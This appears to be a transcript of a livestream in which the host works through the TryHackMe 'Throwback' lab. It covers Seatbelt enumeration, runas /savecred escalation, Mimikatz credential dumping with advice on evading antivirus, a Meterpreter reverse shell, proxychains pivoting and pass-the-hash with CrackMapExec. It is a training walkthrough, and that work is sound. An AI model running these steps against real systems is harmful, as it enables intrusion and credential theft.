Scheduled tasks, is this any chance getting uploaded to YouTube? So yeah, I've been recording for like the past three and a half hours. Unless my computer runs out of space, unless this video takes up all the room left on my hard drive, hopefully I'll be able to save this video and slap it on there. I don't know anyone that would actually wanna watch through all of this because there's probably a boatload of stuff, but if you wanna enjoy the fun that we've been having and you can view it in Twitch videos, yeah. Do you have to be subscribed to be able to view in Twitch videos? I'm just understanding and trying to learn that because PowerShell credentials, Rubeus, Invoke-Kerberoast, Enum CredStore, let's try that thing. Does that work? How do I click run? I don't know, that's not what I wanted to do. I wanted to run. What? I made the thing now, oh, submit. Stupid zoomed in. There we go. Is it doing it? Job started. Pick the session first. They'll do enumerate credential store. Gotcha. Sorry, yeah, everyone was like, John, stupid, just scroll down, you idiot. Well, cause I'm zoomed in too much. Okay. "Starkiller is great for saving information and logging actions, cause it'll automatically save all credentials that are found." Sorry, yeah, I know the zoom in was apparently very disorienting. Okay. Oh, oh, oh, oh, I was, yeah, I should be in like the modules page. Holy cow. Damn son, where'd you find this? Oh, sorry. I didn't mean to blind you. We got this dark mode going on for Starkiller and then I try and alt-tab to TryHackMe. He's like, wow, light. Okay. There's a lot of stuff that power, I'm gonna switch, I'm gonna switch to a different browser. I'm gonna switch, alt-tab, the white. Boom. Sorry. A lot of modules. "Read the above text and familiarize yourself with the menu." Credentials. Everyone was like, you blinded me, John. I needed a warning in this video. Okay. And reporting. Oh, it just keeps track of all those. Oh, sweet. That is really nice. 
You know what? I'll give it that. I feel like less elite hackery, you know? Like I feel like I'm not Elliot Alderson. I'm not hacking the Gibson or anything right now because you hate yourself like, I'm using a GUI program, I'm a noob, I'm a script kiddie. But I'm like, no, this is honestly awesome. I don't, better than sending light mode Discord screenshots. Thanks. Thanks, Nightwolf. I appreciate the callout. I feel seen. "You have a C2 agent responding back from THROWBACK-PROD. Now we need to elevate our privileges in order to dump hashes and passwords with Mimikatz. Your team has suggested to run an enumeration script like winPEAS or Seatbelt." winPEAS I've used. I actually had just used that a little bit ago for the Hack The Box Remote video. And I'm trying to do a little bit more of a, what if you add the credentials that you have? California, you're a genius. Thanks so much. I should actually do that. Add credential. I know a plaintext password for a domain user, THROWBACK\petersj. Sorry, I'm just scrolling through. I know that's insanity looking. What happened? Did it kill my CMD? Whatever, it's just THROWBACK. Thowback, THROWBACK. petersj. Oh no, I can just specify that there. And Throwback317 on the host of, we're on THROWBACK-PROD. Did I do that right? I think so. Okay, whatever. I probably didn't need to exactly do that. Now I wanna go ahead and run Seatbelt. "Your team has suggested to run an enumeration script like winPEAS or Seatbelt to enumerate what services and privileges may be misconfigured on the device and be exploited." Well, I'd be at AvengerCon this year. It'll be online. And I know that's kind of weird. I'll still try to hang out. Obviously I'd love to. And I wanna play the CTF and do all the fun stuff. But man, the whole virtual conferences, the whole remote events is kind of a bummer. I'll be honest. I love being able to see everyone. I love being able to hang out. I love just chilling with everybody. And it's a family reunion, you know? 
It's, oh, Krillix is saying, hey, I may or may not be revamping the Empire room right now and adding and creating custom module exploits. Hype, hype train, that would be incredible. I'm very much looking forward to that. I hope everyone else is. Thanks, Krillix. Yeah, last year, last year of AvengerCon was fantastic. It was really, really cool. I'm very, very grateful that they were letting me squeeze in to that. I guess I don't really count in any of the categories now because I am no longer active duty and I am no longer a government contractor. So someone would have to be like, yeah, John, come on in, we like you anyway. But I would love it. That'd be a blast. "The purpose of this task is to show you how to load and execute tasks in Starkiller. In order for Seatbelt and the privilege escalation to work, you should run Seatbelt over an RDP session using the pre-compiled binary that can be found here." Ah, we're doing RDP stuff. Okay, so this is new for me. This is uncharted territory. It's definitely SpecterOps stuff. GhostPack, you can see the logo there, Rubeus, Kerberos. What is that? What is that joke? What is Rubeus? I realized that we are now Googling Harry Potter. Maybe I'm reading into that and it literally doesn't matter. So Rubeus is named after Rubeus Hagrid who had to wrangle his own three-headed dog. Okay, I follow. Windows Credential Manager doesn't vibe without a desktop session. I follow. Oh, I'll dig that. Okay. "We can use the Seatbelt module within Starkiller to help enumerate the device and find potential attack vectors." Oh, let me actually grab this first. I kind of just jumped right over that and that was probably a bad idea. Moving to that /opt directory. Let's go ahead and git clone this. GhostPack-CompiledBinaries. Sweet. Now what have I got? Rubeus, SafetyKatz, Lockless, Seatbelt. Okay, there's Seatbelt, Sharp. Some of the sharpest of your stuff. Okay, so we want to run situational_awareness/host/seatbelt and let it do its thing. Is that all? 
Can we just trust it to do it? What is Seatbelt though? Before I like, I do wanna learn more about this. Okay, thanks Google. I appreciate you. Oh, here's a Wikipedia article. What the hell is seatbelt is? Thanks. I do wanna learn this rather than just kind of remotely, or roughly walk through all the steps. "Seatbelt is a C# project that performs a number of security-oriented host-survey safety checks." Okay, so it is an enumeration tool, it sounds like. Kind of see what might be broken and wrong. Help you look for enumeration. I mean, I guess I did read that. It did say stuff like winPEAS or Seatbelt to enumerate what might be wrong. Gotcha. Okay, let's do the thing. Let's go to the modules and let's search for Seatbelt. And there he is. And if I go into actions, I need to specify an agent and then do it. Okay, cool. Can I see what he's doing? If I go into that modules, is he gonna run it? Oh, yeah, Invoke-Seatbelt. We die, seemingly. Or am I misunderstanding? No, they run it through Starkiller. I need to take a step back and figure this out for a quick second. "You should run Seatbelt over an RDP session using the pre-compiled binary that can be found here." Oh, it's doing it, just wait a bit. Okay, sorry. View? No, he's just chugging along. Okay, I'm gonna go read this on the side then. So if he's doing his thing, we will eventually find a credential that is stored within the Windows Credential Manager. So what do I need to do about that RDP thing? Did I misunderstand that? I think the session died. Can I check the agents again? Yeah. Oh, no, no, no, no, now I got something. Getting a lot of access denieds, but there are results here. A lot of results. Okay, sorry, that probably looked very sketchy and very weird. There's so much stuff here, holy cow. Okay, I have to scroll through the friggin' the world. Let's make this a little bit bigger somehow. Invoke-Seatbelt. Cannot enumerate antivirus. I switched to the tasks menu for a better view. 
Oh, like a top-wise. "You can either RDP in and run the module with an RDP session in the background, or you can RDP in and pull over the binary and run from there." Okay, I understand. It just won't work. We won't find what we're looking for unless we have the RDP session in. I follow. So if I do a little Remmina RDP on my prod, then I'll be able to find it. So all the time that I was waiting, I was just wrong. It was just not gonna return what I needed to find. THROWBACK-PROD, let's do some RDP. Yes, username should be petersj. Throwback317. Do we need to specify domain or is he gonna be able to figure that out? John Peters. I didn't know his first name all this time. I feel like I've earned a brother. user.txt. Did we already find this? Okay, okay, Remmina, you're good, buddy. Now that we've RDPed in, we can run this again. Right, so Seatbelt, go on our agent and just do it again. Now we should be able to find it, right? So he's doing his thing. Reporting is gonna do this one more time. And it'll take a little bit, but we'll let that go. So we will see something now that we've RDPed in is what I understand. And it'll give a little bit of time to just let him do his thing. "Since we know that there are saved credentials within the Credential Manager from Seatbelt, we can utilize the Windows runas to run a file as an elevated user and escalate privileges. We need an RDP session on this device in order to successfully run this command and escalate privileges." I kinda just wanna ask, is that always the case? And this is just me pitching, because I don't know. Windows Credential Manager has to have a real desktop thing, like network, is that NLA or like network layer authentication that doesn't see these results, no worries. Give it a little bit more time, I guess. And then we should have the new credentials. Oh, from your testing, yes, okay, I understand. Krillix responded, yes, from our testing, there just has to be some desktop session going on. 
Realistically, I don't think that's awful. I don't think that's too bad. Maybe on a regular user workstation, there just might be something that's running. There might be someone using the machine. So I don't know. Hey, can you have some results, Seatbelt? Thanks, man. All right, cool. Now we got something to work with. Hopefully we will find some credentials at this point, but looks like we're getting some ARP table information. I'll zoom in on this more so you can see it. Autoruns, we have a little health systray command is running, CredEnum. No, that's supposed to be able to do something, I think. "A specified logon session does not exist. It may have already been terminated." But why? I'm over here, dude, I'm right here. I'm logged in. It didn't do it. Yep, yeah, I see it. Crap. Well, Krillix, I appreciate you being here with me. I'm really happy to have this sidekick here. "You'll need to pull the binary and run it from RDP." That's fine, I'll do it. You've convinced me. Oh, shit, I fucking foregrounded. I'm sorry. Sorry. I foregrounded, I backgrounded the session of Starkiller and that was probably doing weird things. So let's get our THM throwback. Hosts, moving to prod. Let's copy that GhostPack, ghost down, oh, sorry, it's under /opt, GhostPack-CompiledBinaries, and we want Seatbelt over here. So this directory is still in this web server, the HTTP server is still running in this current directory so that I should be able to move into the desktop. And then let's do another wget to now get Seatbelt. I'll save that as Seatbelt.exe and I will download Seatbelt, seat, not selt, Seatbelt.exe, pull it down, it failed. Seat, no, there is not a capital B in that. Goodness gracious. Seatbelt, gotcha. Okay, now in the RDP session, I should have on my desktop a new Seatbelt. Okay, so, can I, oh, okay, damn. We're just gonna open a regular command prompt then if that's not gonna work for me. cmd, thank you, cd Desktop. 
You guys can probably barely see that and I'm very, very sorry. Let me make this faster and hurry up and run this. Seatbelt has all these available commands. Is there a way that I can just run all? Seatbelt has the following command groups. Seatbelt -group=all runs all commands. Okay, let me make this bigger, sorry. I think Remmina will be able to figure it out. Toggle dynamic resolution update. Yep, okay, and I probably should have invoked PowerShell to make this a little bit better. PowerShell, and I still can't zoom in on that. So let me just right-click it and make the font larger for you. Font, 28, 36, big numbers. cd Desktop, is that a little bit easier on your eyes? Whack, okay, so I know that Seatbelt needs to be supplied with that -group=all. And now he's doing his thing. Cannot enumerate antivirus still. Now we're looking for AppLocker. Whoa, I just whacked Enter to see if it was like stuck on buffering and then it just funneled out. So it's rolling back through here. Now we have ARP table, autoruns found. CredEnum, there it is. There it is. Awesome, awesome, that took us a little bit of time, but I think we finally got it. So admin Peter's J does not have a password. Should there have been a password there? What was the username found from Seatbelt? Wait, I don't need to know. Since we know that there are saved credentials, oh, oh, it's not just gonna show it to us, is it? From Seatbelt, we can see that there may be a user account that has credentials stored within the Credential Manager. We can abuse this to use the saved credentials to run a file with the account's privileges. So runas with /savecred as that user and grabbing their profile, we can run cmd.exe. So admin Peter's J, him as an admin, should be able to do things. No, no password, but you can just run stuff as him. Okay, I will press my I-believe button and hope that my PowerShell prompt comes back to me. Why?
Oh, you're just still running through Seatbelt, that's why. runas /savecred, user equals admin Peter's J, J, /profile, and then cmd.exe, whack. Gotcha, we did it, we did it. We got local admin as Peter's J through our learning process. That was fun. Now I can get to the home directory. What is this, test.py and update.ps1, guys? What is that doing here? Admin Peter's J, dir, cls to get into my desktop. dir, should there have been a flag in there? Am I not the right user still? Should I be able to get into Administrator? dir, yeah, okay, how about Desktop? dir, there he is, there's my root.txt. Let's cat that guy out. type, type, type, type, type. 69 fartlord69, which is literally your name. Glad we got that in the video. You're asking, hey, I'm really bad at PowerShell syntax, what's a good resource to learn the juicy stuff? If you check out Under the Wire, they have some really great stuff. Under the Wire, not OverTheWire. That's a relatively important distinction because they showcase a lot more PowerShell stuff. So where are my readme files at? After getting access, we were able to run Seatbelt.exe and discover that there were some saved credentials. So we were able to run, it was a runas /savecred for his saved credentials, user admin Peter's J with his profile, cmd.exe, and this spawned a local administrator command line. Jackson is asking, by the way, are you writing a report for the whole thing? Oh, maybe. I guess I'm not trying to right now. I'm just kind of taking my notes. Maybe if people are interested in that, I can just put one together, but that requires me to actually finish and complete all this. So I don't know if that's ever actually gonna happen. You could also consider writing in that you had to use, oh yes, thank you, thank you, thank you, thank you. That is a super duper important note.
We needed to run Seatbelt.exe through an RDP session, download the binary and execute it from a real desktop GUI, because for some reason, for some reason the Credential Manager in Windows just didn't want to act without a live interactive session. I'm sure someone will be able to fill me in a little bit more on that later, but from there, we could find the root.txt password in C:\Users\Administrator\Desktop. Awesome, awesome, awesome, awesome. Let's go ahead and slap that into task four. Oh, there's a second user flag that I completely missed. Oh no. Did I lose some of my eight and nine, seven, eight? Oh no. Number seven, what is the root flag on Throwback prod? And this guy should actually have a user.txt that I want to read. Great, what is that, number six? Is there a second user flag in there? What was the hashcat Colab program called again? That was Colabcat, the Colabcat GitHub kind of walks you through it. And that was very cool. That was very fun. Awesome. Here, was there a second user flag that I needed to find? I guess because I'm in PowerShell, I can do a little nice Get-ChildItem and then like a little -Recurse and then do a question mark to be like where the name is equal to user.txt. So Peter's J has one and there's not another one. There's nothing else. Fantastic. Well, because I have root on that box, I could just go see the others. Was it the admin one? I didn't think he had anything on his desktop. I just went there when I was looking. Remmina, what do you got for me? Oh geez, sorry. I'm flailing around my desktop as usual. Can I run powershell.exe from this command line? Yes, I can. And now let me do a Get-ChildItem, -Recurse. Yeah, I see there are a lot of other users. So let's look where name is equal to user.txt and see if there are any others. What? Oh, sorry. I should have a string around that. There we go. Okay, Blair has one on his desktop. So let's hop over there. dir and cat user.txt. Great.
Okay, that is number six that I want to keep track of. Did I have credentials for him? I forget. Oh, and we had a user flag on Throwback WS-01. Shoot, we had root on him. Ubuntu colors on PowerShell is the ultimate bone. Okay, well, let's ignore that for later. hashdump like a boss? Ooh, that's a good idea. Dude, you're totally right. We have an agent that's running and we could just run another one because we have that launcher in place. So, I am currently the admin in this command line shell. But if I run that launcher.bat, did that just die? What the hell? What the hell? Come on. Is Starkiller still gonna get another agent? Yeah, yeah. Okay, does he have life? Give me the goods. Yeah. All right, sweet. hashdump, is that right? Oh, it closes the terminal agent when it deploys. Okay, cool. Good to know. I'm not running on Linux. I'm not running on OSX. Does Mimikatz just do it with that DC one? Mimikatz, can I do a Mimikatz creds_all, please? Just find it. Find the good stuff. Yeah, not dcsync. I wouldn't think it would be dcsync. logonpasswords, lsadump. Okay, that makes sense. Fire away, my friend. Very slick. Very slick. What do you got for me? I don't know if he's just taking his time or what. But we'll let it do its thing. And we will get back to where we were. Actually, that creates a dump file and you need to extract from it. Oh, fantastic. Where does it put that dump file? I shouldn't have done that. cd C:\Users, yeah, where does that dump file go? Eh, let me get back to where I was at. So we ran Seatbelt, we got credentials, we submitted that flag and then, oh, we were supposed to do our own password dumping. Great, is there a sekurlsa logonpasswords? I can check. Let me read through this real quick. Mimikatz, yep. Mimikatz is one of the most famous tools used for dumping passwords on Windows systems. It can be used to dump passwords on both a Windows server and mainstream Windows versions.
However, with its fame, its patterns are incredibly recognizable and are almost immediately picked up by all anti-virus or anti-malware services. So you must disable endpoint protection before attempting to use Mimikatz, or utilize an obfuscated version of Mimikatz with a C2. Mimikatz has many modules available and is being actively supported and updated. Here's a list of the supported modules: log, privilege, sekurlsa, et cetera. We'll only be utilizing four of the modules for the lab: privilege, token, lsadump and sekurlsa. How am I, sekurlsa? Is that how people pronounce that? Mimikatz has a lot more modules that can be used a lot more extensively. Once endpoint protection is disabled, you'll then be able to launch Mimikatz and you'll want to type privilege::debug, which will put you into debug mode, a mode that can only be granted by an administrator. From there, we'll want to elevate privileges to NT AUTHORITY, if you don't already have it, with token::elevate. This will grant you the highest level of access that Microsoft has to offer, which will allow you to basically do anything you want on the system. It's essentially the root user account in Linux. Okay. So I can do that on the box because I could just download the thing if I wanted to. And because I'm using RDP in this case, should we do it? TL;DR, LSASS is the Windows process that does all the security stuff. Its memory has passwords, so you dump its memory and read any stored cached passwords, either hashed or clear text. Nice. Yeah, LSA, Local Security Authority. Nice. Oh, so sekurlsa, or however you pronounce it, yeah, I got you. Cryillic says keep reading the full task, or the full thing in the next task, before dumping anything. This being the least preferred method for, okay, so sekurlsa will do, retrieve the current hashes of any currently logged in users. This is probably the least preferred method of dumping credentials in Mimikatz. I follow.
Now that we know the commands associated with Mimikatz, we can move on to loading the Mimikatz module with Starkiller to bypass anti-virus and dump hashes remotely. Nice. And then we got the not-the-soft-and-fluffy kind. Okay. Oh boy, a lot of stuff here. From the previous task, we know the command syntax for Mimikatz. Now, an easy way to get it on the machine is to execute a Mimikatz command. This can be easily done by getting a Mimikatz binary and putting it on the machine. However, this will get picked up almost instantly by pretty much every anti-virus. To make life easier and bypass AV, you can utilize a C2 like Empire to load a Mimikatz module and execute commands remotely. We already have a responding agent on Throwback, so we can continue to use our agent with elevated privileges. Yep. We brought in that admin one. Starkiller offers 16 different modules for utilizing Mimikatz. Most of them are specific to one Mimikatz module, such as SoverTickets. Empire also has a module that can run any Mimikatz module and command, an Empire module for, is that thing. We'll be utilizing the command module. However, the other modules have the same functionality. Gotcha. So, then you just specify what you want. Roger. Let's do it. Let's do the thing. We got Starkiller up. Let's go into our modules. We can search for our Mimikatz and let's use that command one. Actually, let me just get to the agent, sorry. I wanna specify this one specifically. So, let me search for a module and I'll look for Mimikatz once again and command. That does require a command to run and it was privilege::debug. Was it one colon or two? It was two colons. So, go. Okay. Now he's doing his thing. Let me check out the reporting that we got here. That was just now and it did it. Great. I don't think I have any output yet. Maybe I need to wait. That's fine. That's fine. We could use the sekurlsa and logonpasswords after that. I'm just gonna do it and see what happens. So, agents on our admin one.
Let's search for that. No, oh, oh, oh, okay, got it. So, it did get into privilege mode and now I am NT AUTHORITY\SYSTEM. Can I verify that? I just wanna see real quick. Does it? Oh. Okay. It might, is it gonna be like in that session? Or, oh no. It told me that I needed to run privilege::debug and then token::elevate. I wanna do that first. I hope that's cool. Mimikatz command and then it's token::elevate. So, do it please. He's doing his thing. Give him a little bit of time. And then we can go on and dump passwords as we talked about. They suggest using sekurlsa. Someone please tell me if I'm saying that the wrong way. sekurlsa logonpasswords. And then, oh, it'll automatically add those. Is that right? It'll automatically put those in the credentials. I don't need to put them in myself. Nice. Okay. We didn't, Cryillic is responding in the chat. We didn't add it because it's not needed, but it's a good practice to try and elevate with token::elevate. So I'm glad I did. Yeah. It did it. whoami? Let me be SYSTEM. What? What? Ha ha ha ha ha. Yeah. Whatever. I'm, I'm misunderstood. Am I misunderstanding that? You know what? It's okay. It's all good. It's all good. Mimikatz command. And let's use the sekurlsa logonpasswords. Please do that thing. He's gonna go and I will see what domain user might be logged in, in the user's hash and NTLM hash. Roger. And then how far left, how much do we have left? Oh boy. I don't know if I wanna go through this whole thing. You know? How long we've been going? Four and a half hours. So we're keeping it real. Appreciate those of you that for some reason stuck with me. All right. We got sekurlsa here. And I see Throwback prod dollar sign. Or what is this? The default app pool is seemingly logged in. That's not a real user. Peter's J is logged in. That's me. RemoteInteractive. Is there another? Nice. Clear text password for admin Peter's J. Dope. I wanna keep that in the back of my pocket. That's true. That's true.
Half of this video has been me trying to run hashcat. I'm failing at that. Where do I wanna stick and put this thing? Need more John live streams, dude. Hopefully we can do a lot more of this. Hopefully, hopefully. We'll see. Admin Peter's J. Password. What else was there? Who else is online? SSHD. A little virtual user, it sounds like. TWM window manager. Is there another user that I should be seeing? Admin Peter's J. Interactive from zero. Admin Peter's J. A lot of output here. Network clear text. Yeah, it's almost one AM. It's actually 12:40 my time. There's Blair J still. Is he the one that we're asking for? Blair J? Yeah, we are. We have his NTLM hash. What? Oh, sorry. User's NTLM hash, and I need the administrator's hash. Administrator NTLM hash. Nice. Okay, so I could crack those if I wanted to. Yeah. We could do that with some Colabcat now that we've got that smarted out. Yo dog, I heard you like proxies. Let's see what this next gimmick is. All right. Let me take a quick breather if that's totally cool for those of you that are for some reason sticking with me. I don't know why or how, but it's good that we got this video still going. So. Oh, did I pass Blair J's clear text? What? Thank you for telling me. Nice. Thank you. Thank you. You catch Cryillic telling me like, yo dude, you totally missed Blair's plain text password. Blair J clear text. And I should have probably saved some of those hashes other than what I submitted to TryHackMe. But let me take a quick breather, bio break, you know. Be right back in three to five minutes. Sounds like Microsoft Sam. I've learned so much, but can't do anything myself. That's not true at all. I hope this video was kind of fun. I know we've been going for a long time, but I think there's a bio break. Haven't heard that since EVE Online, dude. Let me, yeah, possibly from here on out, the passwords might not be able to be cracked. Just run cmatrix. Duh, obviously. Nightwolf, why are you still awake with me, dude?
What are we doing? cmatrix with a, like, I didn't mean to yell. I didn't mean to laugh so loudly into the microphone. I'm so sorry. Transparent color. I don't know. I do it out, do it for LPC. This should be literally everyone's, this should be every InfoSec streamer's be-right-back. Just a text editor window with cmatrix. All right, give me just a few minutes. Thanks, I love you. Yo, hey friends. I don't know how many of y'all are still with me. Oh boy. Thanks for coming to hang out, everybody. I mean, it blows my mind, you guys are still here. Thanks for doing this. So, if we're really going in for the long haul here, I know we finished one Monster, and it's almost one o'clock in the morning, but you know what's better than that is a second Monster if we're gonna keep cranking. Uno momento, please forgive me. Jesus, that's still really loud. I'm sorry, I'm really sorry. Rest in peace, headphone users. Let's, gotta work in an hour so it's fine. I'll stick around. I also work online, so I'm probably gonna be watching during. Sweet. I'm super duper, yeah, still here four hours and two hashcats in. You're all the best, I love you. Thanks, chat. Let's get back at it. Your team has informed you to try the Throwback Hacks, taking on some proper security practices and are properly segmenting their network resources. Now that you have a couple of footholds on a network, you can utilize them as a proxy server to pivot and access internal resources. So we're gonna do some pivoting. Yeah, I'm chilling over on the other side of the world at 3 p.m. I appreciate it. You guys are having some good time. I got a message from my lady who's at work. I was like, hey, are you still awake? I'm like, yeah, I'm awake. Also seeing some comments on the latest Hack The Box video, so that's good. Let's check it out.
In a good network, often referred to as a segmented network, there are certain rules in place preventing users from accessing certain parts of the internal LAN, like the workstation subnet should not be able to access the servers. This can be a headache for pen testers on occasion, as most networks are not segmented. These networks are referred to as flat networks. To make segmented networks more like flat networks, there are proxying tools such as proxychains or sshuttle, or SSH shuttle, which make it incredibly easy to pivot from one subnet in a LAN to another. Metasploit also offers a proxy server as part of its post-exploitation tools, and we'll cover that below. Okay, so we're gonna use autoroute. That's good enough. Yeah. Cryillic says, yeah, John, your girlfriend's gonna come home and you're gonna be still streaming on like your fifth Monster. I don't know. We got six more hours. We got six more hours until Bake comes home, so hopefully we'll finish this in time, or I'll just bail. But to set up a proxy server, you'll need a Metasploit session or a reverse shell opened in Metasploit beforehand. You can easily get a Metasploit shell by uploading a payload to the machine and executing it. Yeah, let's do that. Let's do that. We've got a Metasploit shell that we put together for Linux one, and that had died, I think. I think, anyway. We had a Metasploit and that was not a shell for, we did it for the phishing. We did it for phishing. So that was running on 4444? Is that right, I think? This is my OpenVPN thing over here, but let's start up msfconsole and get ready to run this bad boy one more time. We could probably download this guy. I'll put him in, who am I right now? Am I admin currently? I'm still Peter's J. Ooh, I wanna be admin. Ooh, oh, I still have that RDP on the box. Yeah, rest in peace Terminator from when it died earlier. Let's make this a black screen so you guys can see a little bit cooler and fancier.
And let's use exploit/multi/handler, or for the sake of time, we'll just use multi/handler with a typo in it so that it fails. And let's set our payload to that Windows Meterpreter reverse TCP. We'll set our LHOST to tun0, specify the interface, and our LPORT was 4444, I think, right? So I could run this or type exploit to kickstart that. And I hope he uses exploit. All right, let's stop the, we'll stop the listener so we can run exploit this time. John uses MSF6, he lives on the edge. Yeah, I don't know. I just like to have things updated, at least Metasploit. So let's stop this HTTP server that we have running and let's go bring it into the Meterpreter folder so I can python -m http.server this one. And let's grab this IP address, because I know that's mine. And let's hop over to our reverse shell connection where I am running as admin PJs. That's not his name. And we'll cd over to Windows\Temp now that we should be able to access that. Yeah, okay. And there's my A directory. That's the A file that I wrote earlier, I thought. Sure. Let's PowerShell it up. Let's PowerShell. Cool. And let's wget to that http:// my IP address, port 8000, and it's not a shell.exe. And I need to actually save that. Sorry, I'll call it met.exe. And now I should have met.exe present here. So fingers crossed, if I were to open this up on one side and then slam that to another side of my screen, I should be able to run met.exe with a dot slash because I'm in PowerShell, whack that, and that fails. Did it get nerfed or did I run it on 4444 earlier? No, I didn't, because that was the reverse shell. We ran this on quad. We ran this on 4141, didn't we? I think. Who asked me to do that earlier? set LPORT 4141, maybe, and we'll use exploit because that's what people wanna see. Okay, hello, Meterpreter. Great, I guess that's good. Then we could start this autoroute. So we'll background this, by the way, and use that post module multi/manage/autoroute.
So we could check out the sessions that I have. sessions with an S, looks like session one is where I have that current session, which makes sense. I didn't mean to interact with it, sorry. I do want to just set the session variable, or the option for this module, to that and we'll set our subnet, is that a thing? show options, you can set a subnet. What? So set subnet to 10, 200, 24, zero. Right, because I am in 24, in my case, that's my subnet. So that should do it and then I just go, exploit. Okay, great. Now we have that autorouting done and we could start up a SOCKS server. We could do that also with proxychains. Yeah? Do I have proxychains installed? I might not on this box. How do you bring the background task back again, sorry? So you might have seen me do it just kind of ad hoc. When I ran sessions, that'll show me all of the active sessions in Metasploit, and Meterpreter or like cmd.exe or whatever session you actually have open. So you can do sessions -i to interact. And if you take a look at the help, sessions with an S plural, -i will let you be interacting with one of those options. So I don't think fg will do it, will it? No, no, Metasploit's like, what was that? Yep, yeah, we're Metasploit. So sessions -i and the session number. Gotcha. All right, we need proxychains. So not a thing. Let's go and install it. So apt proxychains4, looks like the latest version seemingly, thanks Ubuntu. Yeah, for sure. Chat said thanks for that quick demonstration. I realized that I'm still recording a video so I feel like I have to offer context for if for some reason people watch this video after the fact. I don't know who'd sit through these five hours of me just fumbling around on my keyboard. And then we could set up our proxy. Now we can proxychains just about everything that we want. How often do I stream? This is very, very new. This is the first time I've ever streamed on Twitch and this probably does not happen often.
I'm trying to get better about making time in the evening for me to do this sort of thing, but it's a toss-up, you know, like I have to kind of keep life in mind. So let's use this auxiliary server and then let's show options. See what we got. Anything in this Meterpreter or in this Metasploit session? Default ports, totally fine. Yeah, thanks man. So if you haven't heard of my YouTube channel, it's kind of what I normally do. And auxiliary module running as background job zero, starting the SOCKS4 proxy server. Looks like that's good. So let's sudo nano /etc/proxychains on our current machine, and down at the very, very, very bottom, socks4, it would be listening on localhost, but we need to change that to 1080. So let me just copy that line and move this to 1080. Yeah. Okay. I think that's fine. There's an extra space in there that it was tweaking out over. Great. Now I could proxychains and run commands. So if I were to proxychains ping that 10, 224, is it like 219? Yeah. Cool. Now we're cruising and it'll just run. It'll just do it. Pivoting with proxychains. Pivoting may seem like a very big and scary thing, but it's actually fairly simple after you have your proxy server set up. After setting up the proxy server, you can pivot to any machine or resource that the proxy server has access to. For example, if you had a proxy server on example workstation one and example workstation two, that second machine, was segmented by a security group, made so only example one had access to it, you could use your proxy server on example one to access example two. You can use any way of accessing the machine you'd normally use, like SSH, RDP, WinRM, PsExec, you just have to prepend the command with proxychains and then it'll just do it. Some examples here using SSH or RDP or Evil-WinRM. You could also set up a web proxy with FoxyProxy. Let's add an extension to a web browser. Do I actually have FoxyProxy set up in here?
I actually, I literally have FoxyProxy. Nice, nice. Click on FoxyProxy among your extensions. After that, click on options and add. And I already have one for Burp Suite, actually very, very similar to what they have, which is kind of funny. And then let's create a SOCKS proxy. So let's do that. I will go into the options tab here and now I'll add a new proxy. It'll be that SOCKS4 proxy that we're doing and it'll just go back to my localhost because that's where it's running, but port 1080, which is the same one that we've just specified over here, that's gonna be our SOCKS proxy. I can call this like SOCKS4 proxy and we'll give it a nice little color, blue, I guess, and then we'll save that. Cool. Now that that's a thing, it should be good. Read the above and set up your proxy. I did it. Great intentions, courtesy of Microsoft. Where do you need to do some CrackMapExec? I butchered that word, CrackMapExec. Now that we've enumerated and attacked all the initial vectors, we can begin to collect the credentials that we have, as well as what footholds we have on the network, to see how we can laterally move through the network. The first thing to do, when we have credentials but don't know what to do with them, is to try and pass the hash with them. This checks each IP and validates the credentials. You'll need to practice passing the hash with the hash you dumped in task 20 as well as the hash from task 10. Okay, so I remember task 10, that was our security center boy, and task 20 we found for Blair, I think, or for admin, one of them. So pass the hash is an attack wherein we can leverage found NTLM or LAN Manager hashes of user passwords in order to successfully authenticate. This is a huge room, seems realistic though. Yeah, well done. Obviously kudos to Cryillic for this incredible thing. I hope I can help shine some light on this Throwback room. Even though I didn't do it using SSH tunnel, I would recommend using it on the firewall. Ooh, okay.
I will certainly play with it. Yeah, I'd love to be able to kind of jam with that and explore it. This is possible due to the well-intentioned security feature within Windows where passwords, prior to being sent over the network, are hashed in a predictable manner. Then, originally with the intent of avoiding password disclosure, we can actually leverage this feature to capture and replay hashes, allowing us to authenticate as other victim users. In this section, we'll dig into this further with the tool CrackMapExec. Yes. It's finally time. Finally time. Okay, man, I really built that up, didn't I? Pretty anti-climactic on that one, huh? Okay, CrackMapExec. Let's get this thing in, let's get this thing in my Ubuntu box here. So, let me hop over to my opt directory, which I've got, and let's git clone byt3bl33d3r's. Crap map, crap, crap, how many times? Why would you? The name of this tool is a little bit hard to say. I'm gonna say like, crap, Mac, exact. No hate, like obviously, I think in love, byt3bl33d3r, that guy's a genius. He's Silent Trinity, right? Can I just install this guy? CME, that's a much better way to say it. Come here. And please see the installation. Kali, exact, Debian, Ubuntu. python3 setup.py install. Whack, I'll probably need to do that as user. Woo, now he's cruising. Cool, cool, cool, cool. We got a lot here. Done, now can I run CrackMapExec? I can, oh no, what the what? I guess I should probably install everything from the requirements first. It'll do that automatically as user, I think, right? I mean, pip install should have done that. Why did that fail? How did I run that Python? Was that Python 3 when I ran setup install? There's so much output now, I probably can't tell. I'll wait till I get my command line back and just kinda check through the history. But I don't want that to just crash when it tries to run. Did I use pip3 or pip? I just ran that with pip3, so yeah. I mean, you're right. I mean, that's a good call.
You're just thinking the same thing. Like, oh gosh, more Python versioning crap. Crap map exec. So with proxychains, we can run crap map crap. We can run crack, CME, and try to use SMB. What does that do? Does that just tell it like, I ran Python originally itself. So not, and that puts me at 3.8. CrackMapExec. No. What is this? Pardon, like I could sudo install, but that'd just be, you know what? Okay, fine. We'll see if this helps or just makes things worse. Probably the latter. It's usually the latter. Sorry, I was trying to move the microphone down. I realized I made some more stupid noises. I'm still learning how to stream, guys. Funny just talking to myself like alone in this room, but hanging out with you guys. It's kind of a weird feeling. All right, CrackMapExec. Still dies. Let me sudo that with the requirements and see if that destroys anything else. We will work. We will get this right. I know we will. Yeah. Reminds me of getting frustrated and trying to install just about anything sometimes. Doing fine, boo. I appreciate that. Thanks, chat. Anyway, I wanted to learn about what it's doing when it uses that SMB move. Are there docs? Is there documentation? Yeah. Heavy use of Impacket. Still going. And this is the documentation. Okay. So, selecting and using a protocol. I'm assuming that's where I can learn a little bit more about SMB. To use a specific protocol, run CME and a protocol. Will CME just be the command that I need to run? Yeah, that still dies. CrackMapExec. Maybe I need to just install this with explicitly Python 3 and then not with sudo again. install --user. Map exec. sudo. Oh no. Man. I have a text message. Sorry. She says, you've been streaming for four hours? So yeah, this is weird. I know this is not normal. I think you can try force reinstall, says the chat. Force reinstall. Is that right? Or do you mean it would, like, with pip? Yeah, 